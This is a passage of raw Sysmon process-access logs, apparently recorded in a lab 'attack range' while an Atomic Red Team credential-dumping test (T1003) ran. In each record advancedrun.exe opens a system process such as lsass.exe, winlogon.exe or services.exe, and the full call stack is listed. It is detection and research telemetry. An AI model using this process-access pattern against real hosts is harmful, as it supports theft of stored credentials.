xe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003942714Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942713Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942712Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942711Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942710Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942708Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942707Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942706Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942705Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942703Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942700Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942699Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942698Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942697Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942696Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\